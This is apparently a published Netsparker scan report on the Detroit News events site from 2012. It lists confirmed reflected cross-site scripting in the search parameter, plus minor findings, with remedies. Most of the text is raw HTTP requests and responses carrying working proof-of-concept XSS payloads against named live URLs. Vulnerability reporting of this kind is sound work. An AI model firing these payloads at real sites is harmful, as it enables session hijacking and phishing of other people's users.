XSS, Cross Site Scripting in events.detnews.com, CWE-79, CAPEC-86, Report



Netsparker - Scan Report Summary
TARGET URL
http://events.detnews.com/
SCAN DATE
1/14/2012 7:52:39 AM
REPORT DATE
1/14/2012 8:21:54 AM
SCAN DURATION
00:22:41

Total Requests

24214

Average Speed

17.78 req/sec.
9
identified
6
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
33 %
MEDIUM
11 %
LOW
33 %
INFORMATION
22 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/crossdomain.xml Open Policy Crossdomain.xml Identified Yes
/opensearch/description26.xml E-mail Address Disclosure No
/search st GET Cross-site Scripting Yes
st GET Cross-site Scripting Yes
st GET Cross-site Scripting Yes
swhen GET Internal Server Error Yes
/sitemap.xml Nginx Server Version Disclosure No
Sitemap Identified No
/user/login return_to GET Cookie Not Marked As HttpOnly Yes
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /search

/search CONFIRMED

http://events.detnews.com/search?city=Ann+Arbor&st=%22%3E%3C/style%3E%3Cscript%3Ealert(9)%3C/script%3E

Parameters

Parameter Type Value
city GET Ann Arbor
st GET "></style><script>alert(9)</script>

Request

GET /search?city=Ann+Arbor&st=%22%3E%3C/style%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7CzoPc2Vzc2lvbl9pZCIlYjAwN2Y3MzIwNjYyZGNlY2I5YjY2NGM3YTZkYWMyYzUiDmxhc3Rfd2hhdCItPjwvc2NyaXB0PjxzY3JpcHQ%2BbmV0c3BhcmtlciA5IDwvc2NyaXB0PiIIcmlkaQYiC2J1Y2tldEYiDmxhc3Rfd2hlbiIQTmV4dCA3IERheXMiDWxvY2F0aW9uexEiC3JhZGl1c2lQIgljaXR5Ig5XYXRlcmZvcmQiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY5MDc0NDI5OTk5OTk5OQAy%2FyITZGlzcGxheV9zdHJpbmciEldhdGVyZm9yZCwgTUkiDXRpbWV6b25lIhRBbWVyaWNhL0RldHJvaXQiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy04My40MDY2MTMxOTk5OTk5OTUAB80iDGFkZHJlc3MiEXdhdGVyZm9yZC1taSIRd2hlcmVfc3RyaW5nQBYiCnN0YXRlIgdNSQ%3D%3D--447bc94f6cf6acc3ca819abf183edd9409c640c7; welcome=WoUDhFiJsrUv8J4dD8WspA.130339242; zvents_tracker_sid=WoUDhFiJsrUv8J4dD8WspA.130339242
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 14:11:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
X-Runtime: 122
ETag: "6fb3841ac66d7bfd019476e6cbeba9ca"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www8
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlYjAwN2Y3MzIwNjYyZGNlY2I5YjY2NGM3YTZkYWMyYzUiCHJpZGkAIg5sYXN0X3doYXQiACIJc2VpZGkGIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ESIJY2l0eSIOV2F0ZXJmb3JkIgtyYWRpdXNpLSINbGF0aXR1ZGVmGjQyLjY5MDc0NDI5OTk5OTk5OQAy%2FyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciEldhdGVyZm9yZCwgTUkiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgzLjQwNjYxMzE5OTk5OTk5NQAHzSIRd2hlcmVfc3RyaW5nQBsiDGFkZHJlc3MiEXdhdGVyZm9yZC1taSIKc3RhdGUiB01J--ac37a882f02adbe622ed087b01be9fce97c59b4b; path=/; expires=Sat, 14-Apr-2012 14:11:16 GMT; HttpOnly
Content-Encoding:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Search Results - Detroit News</title> <script type="text/javascript"> var zlogid = "PanSrYq3j3Xqmy_bYBmCdg"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = '\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;'; var z_temp_type = 'searches'; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_city = 'Ann Arbor';var z_st = '\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;';var z_swhat = '';var z_swhen = '';var z_swhere = '';var z_srad = '40';var z_action = 'index';var z_cobrand = '#&lt;Partner:0x2ad3fec42230&gt;';var z_controller = 'search';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.673227600632077" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_"></style><script>netsparker(9)</script>"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"PanSrYq3j3Xqmy_bYBmCdg","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop4="40"s_zv.prop5="1"s_zv.prop48="art_DET"s_zv.prop6="\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;"s_zv.prop49="art_ZEN"s_zv.prop7="0"s_zv.prop8="new"s_zv.prop1=""s_zv.prop10="Waterford, MI"s_zv.prop2=""s_zv.prop3="" s_zv.pageName="\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;:searches:text" s_zv.channel="\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;" s_zv.hier1="\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;,searches" s_zv.prop12="searches" s_zv.prop25="/search?city=Ann+Arbor&amp;st=%22%3E%3C/style%3E%3Cscript%3Enetsparker(9)%3C/script%3E" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|\&quot;&gt;&lt;\/style&gt;&lt;script&gt;netsparker(9)&lt;\/script&gt;:searches:text" s_zv.server="www8.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" s_zv.events=s_zv.apl(s_zv.events,"event1",",",2); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&amp;lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">

<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>

<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>

<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>

<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>

!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script&gt;
<!-- End OAS Ad Code -->

<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>

</head>

<body class="ody-skin">

<div class="ody-custom interactive">
<div class="ody-custom-wrapper">

<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>

<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">

<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Waterford, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City &amp; State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.673227600632077" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&amp;lid=Header_NavBar_&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;&amp;lpos=&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;_searches">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&amp;lid=Header_NavBar_&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;&amp;lpos=&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;_searches">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&amp;lid=Header_NavBar_&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;&amp;lpos=&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;_searches">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&amp;lid=Header_NavBar_&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;&amp;lpos=&quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt;_searches">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Fcity%3DAnn%2BArbor%26st%3D%2522%253E%253C%2Fstyle%253E%253Cscript%253Enetsparker%289%29%253C%2Fscript%253E">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Fcity%3DAnn%2BArbor%26st%3D%2522%253E%253C%2Fstyle%253E%253Cscript%253Enetsparker%289%29%253C%2Fscript%253E">Log In</a></div><div id="content"><script type="text/javascript"> Zvents.tracker.notifySearchView( '', '', 'st="></style><script>netsparker(9)</script>&ssi=0&ssrss=5&srss=11');</script><div style="margin-top:3px;"><div id="navigation"><div id="facets"><div class="comp" id="refine_results"><div class="label">Refine Results</div><div class="content"><div class="facets"><div class="facet_title">No search results.</div></div></div></div></div><br /><div class="comp" id="partner_left_rail"><div class="label">Support</div>
<div class="content">
<ul class="ulindent">
<li><a href="/support/contact">Contact Us</a></li>
<li><a href="/support/help">Help / FAQ</a></li>
<li><a href="/support/content_guidelines">Content Guidelines</a></li>
</ul>
</div></div></div><div id="search_content_main"><div id="error_message">Invalid search: "></style><script>netsparker(9)</script> is not a valid search category.</div><div id="search_wrapper"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#within_form").submit(function(){ parent.location = '/search?city=Ann+Arbor&st=%22%3E%3C%2Fstyle%3E%3Cscript%3Enetsparker%289%29%3C%2Fscript%3E&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; return false; }); $ZJQuery("#srad2").blur(function(){ parent.location = '/search?city=Ann+Arbor&st=%22%3E%3C%2Fstyle%3E%3Cscript%3Enetsparker%289%29%3C%2Fscript%3E&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; }); });</script><div class="resultinfo"> within<form name="within_form" id="within_form"><input type="text" name="srad2" id="srad2" value="40" size="3"></form> miles</div><div class="no_results"><h3 style="margin-top:0px">We don't have anything for "<span></span>" in our &amp;quot;&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;netsparker(9)&amp;lt;/script&amp;gt; search.</h3><h3 class="sub_heading">Give it another go!</h3><p>Be as general as the "jazz" music you appreciate or as specific as that "USC / Cal Football" game for which you need tickets. Enter a search for what you want to do or simply what you enjoy. </p><h3 class="sub_heading">Expand Your Search</h3><a href="/search?city=Ann+Arbor..
- /search

/search CONFIRMED

http://events.detnews.com/search?acat=3&cat=3&new=n&search=true&srad=40&srss=50&ssi=0&ssrss=5&st='%3..

Parameters

Parameter Type Value
acat GET 3
cat GET 3
new GET n
search GET true
srad GET 40
srss GET 50
ssi GET 0
ssrss GET 5
st GET '><iMg src=N onerror=alert(9)>
svt GET text
swhat GET family
swhen GET 3
trim GET 1
sort GET 1

Request

GET /search?acat=3&cat=3&new=n&search=true&srad=40&srss=50&ssi=0&ssrss=5&st='%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&svt=text&swhat=family&swhen=3&trim=1&sort=1 HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate
Host: events.detnews.com
Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiCXNlaWRpByIIcmlkaQAiDmxhc3Rfd2hhdCIsLyAgc3RZbGU9IHggZXhwcmUvICAvc3Npb24gbmV0c3BhcmtlciA5Ig5sYXN0X3doZW4iBjMiC2J1Y2tldEYiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESIJY2l0eSIYUG9ydCBIdXJvbiBUb3duc2hpcCILcmFkaXVzaS0iDWxhdGl0dWRlZhI0Mi45NzY2MTQyAOeUIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIg10aW1lem9uZSIUQW1lcmljYS9EZXRyb2l0IhNkaXNwbGF5X3N0cmluZyIcUG9ydCBIdXJvbiBUb3duc2hpcCwgTUkiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgyLjQ4NjEwNTMwMDAwMDAwNgB6YyIRd2hlcmVfc3RyaW5nQB0iDGFkZHJlc3MiG3BvcnQtaHVyb24tdG93bnNoaXAtbWkiCnN0YXRlIgdNSQ%3D%3D--8eff39315917e44102272ff24a2f2d42bebeb4f6; welcome=bfi54I2inY-9f2MM19CNcg.130339426; zvents_tracker_sid=bfi54I2inY-9f2MM19CNcg.130339426

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 14:15:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
X-Runtime: 133
ETag: "82d54e8e5980befc134dd552cbc54f54"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www24
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiDmxhc3Rfd2hhdCILZmFtaWx5IghyaWRpBiIJc2VpZGkHIgtidWNrZXRGIg5sYXN0X3doZW4iBjMiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESILcmFkaXVzaS0iCWNpdHkiGFBvcnQgSHVyb24gVG93bnNoaXAiCmVycm9yRiINbGF0aXR1ZGVmEjQyLjk3NjYxNDIA55QiE2Rpc3BsYXlfc3RyaW5nIhxQb3J0IEh1cm9uIFRvd25zaGlwLCBNSSINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgyLjQ4NjEwNTMwMDAwMDAwNgB6YyIMYWRkcmVzcyIbcG9ydC1odXJvbi10b3duc2hpcC1taSIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdNSQ%3D%3D--21b89f58d74fbf6effea3c8335bcd2487568bb2a; path=/; expires=Sat, 14-Apr-2012 14:15:21 GMT; HttpOnly
Content-Encoding:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Search Results - Business &amp;amp; Tech - Detroit News</title> <script type="text/javascript"> var zlogid = "Af5dCaCfn1eZy0XlYbvwqQ"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = '&gt;&lt;iMg src=N onerror=netsparker(9)&gt;'; var z_temp_type = 'searches'; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_cat = '3';var z_new = 'n';var z_ssrss = '5';var z_search = 'true';var z_st = '&gt;&lt;iMg src=N onerror=netsparker(9)&gt;';var z_swhat = 'family';var z_srad = '40';var z_swhen = '3';var z_trim = '1';var z_swhere = '';var z_acat = '3';var z_action = 'index';var z_cobrand = '#&lt;Partner:0x2b8556f11718&gt;';var z_svt = 'text';var z_controller = 'search';var z_sort = '1';var z_srss = '50';var z_ssi = '0';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.451530329483086" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_'><iMg src=N onerror=netsparker(9)>"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"Af5dCaCfn1eZy0XlYbvwqQ","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop4="40"s_zv.prop5="1"s_zv.prop48="art_DET"s_zv.prop6="&gt;&lt;iMg src=N onerror=netsparker(9)&gt;"s_zv.prop49="art_ZEN"s_zv.prop7="0"s_zv.prop8="existing"s_zv.prop1="family"s_zv.prop10="Port Huron Township, MI"s_zv.prop2=""s_zv.prop3="3" s_zv.pageName="&gt;&lt;iMg src=N onerror=netsparker(9)&gt;:searches:text" s_zv.channel="&gt;&lt;iMg src=N onerror=netsparker(9)&gt;" s_zv.hier1="&gt;&lt;iMg src=N onerror=netsparker(9)&gt;,searches" s_zv.prop12="searches" s_zv.prop25="/search?acat=3&amp;cat=3&amp;new=n&amp;search=true&amp;srad=40&amp;srss=50&amp;ssi=0&amp;ssrss=5&amp;st=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&amp;svt=text&amp;swhat=family&amp;swhen=3&amp;trim=1&amp;sort=1" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|&gt;&lt;iMg src=N onerror=netsparker(9)&gt;:searches:text" s_zv.server="www24.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" s_zv.events=s_zv.apl(s_zv.events,"event1",",",2); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&amp;lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">

<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>

<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
